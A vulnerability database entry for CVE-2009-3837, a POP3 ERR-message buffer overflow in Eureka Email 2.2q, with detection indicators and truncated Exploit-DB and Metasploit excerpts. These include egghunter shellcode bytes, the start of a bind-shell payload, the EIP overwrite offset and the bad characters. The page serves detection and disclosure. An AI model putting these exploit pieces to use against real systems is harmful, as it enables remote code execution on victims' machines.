CVE-2009-3837
Published 2009-11-02
CVE-2009-3837: Stack-based buffer overflow in Eureka Email 2.2q allows remote POP3 servers to execute arbitrary code via a long error message.
Priority P3 · 52 · critical · CVSS 2.0 base score 9.3 · vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available. EPSS: 32.07% (98.1th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eureka-email | eureka_email | — | — |
Detection & IOCs (extracted from sources)
- bytes (egghunter stub): \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
- bytes (egg tag): w00tw00t
- Detect oversized POP3 ERR responses on port 110 exceeding 512 bytes, which trigger the wsprintfA stack buffer overflow in "Eureka Mail.exe" at offset 0x43bdf2.
- Look for the egghunter tag 'w00tw00t' in POP3 ERR response payloads on port 110 as a strong indicator of an exploitation attempt.
- Flag POP3 ERR responses containing ~710+ bytes of padding followed by a return address, consistent with the known EIP overwrite offset of 714 bytes.
- Monitor for rogue POP3 servers (port 110) sending excessively long ERR messages; the exploit requires the victim to manually check mail (Ctrl-M) to trigger the vulnerable code path.
- Detect the PrependEncoder stack-adjustment stub bytes (\x81\xc4\xff\xef\xff\xff\x44) prepended to shellcode in POP3 ERR payloads.
- BadChars for this exploit are null byte, LF, CR, and space (\x00\x0a\x0d\x20); shellcode in ERR payloads will not contain these bytes, which can help tune detection signatures.
- The exploit is described as unreliable and only triggers when the victim manually checks mail via Ctrl-M; automated startup mail checks do not reach the vulnerable code path, limiting the exploitation window.
- The EIP overwrite offset varies depending on the length of the attacker's LHOST IP address string, so the exact offset is dynamic across different attacker IPs.
- Return addresses (JMP ESP gadgets) are hardcoded per OS/SP version; the exploit targets Windows XP SP2 and SP3 English only.
No detection rules found.
Exploit-DB: Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
exploitdb · 2010-08-25 · CVE-2009-3837
---
```ruby
##
# $Id: eureka_mail_err.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
      # bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1
      # overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address
      'Description'    => %q{
          This module exploits a buffer overflow in the Eureka Email 2.2q
        client that is triggered through an excessively long ERR message.
        NOTE: this
```
Exploit-DB: Eureka Email Client - Remote Buffer Overflow
exploitdb · 2009-11-26 · CVE-2009-3837
---
```python
#!/usr/bin/env python
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
##########################################################
import sys, socket

# egghunter (32 bytes)
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
             "\x77\x30\x30\x74"  # this is the egg: w00t
             "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444
bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
             "\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed"
             "\x1e
```
Exploit-DB: Eureka Email Client 2.2q - Buffer Overflow (PoC)
exploitdb · 2009-10-23 · CVE-2009-3837
---
#####################################################################################
Application: Eureka Mail client
Platforms: Windows XP Professional SP2
Exploitation: remote BoF
Date: 2009-10-06
Author: Francis Provencher (Protek Research Lab's)
Special Thanks to: M Jeremy Brown
#####################################################################################
1) Introduction
2) Technical details
3) The Code
#####################################################################################
1) Introduction
Sick of junk email? Bored of all email programs looking the same? Take a look at Eureka Email and see how different things could be...
Eureka Email has a built in junk email filter which can remove about 95% of y
Metasploit: Eureka Email 2.2q ERR Remote Buffer Overflow
This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.
No writeups or analysis indexed.
References:
- http://osvdb.org/59262
- http://secunia.com/advisories/37132
- http://www.packetstormsecurity.org/0910-exploits/eurekamc-dos.txt
- http://www.securityfocus.com/archive/1/507376/100/0/threaded
- http://www.securityfocus.com/archive/1/508126/100/0/threaded
- http://www.vupen.com/english/advisories/2009/3025
- https://exchange.xforce.ibmcloud.com/vulnerabilities/53940
Published: 2009-11-02